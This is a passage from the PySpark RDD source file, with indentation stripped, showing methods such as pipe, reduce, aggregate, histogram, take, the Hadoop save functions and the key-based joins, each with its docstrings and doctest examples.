>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
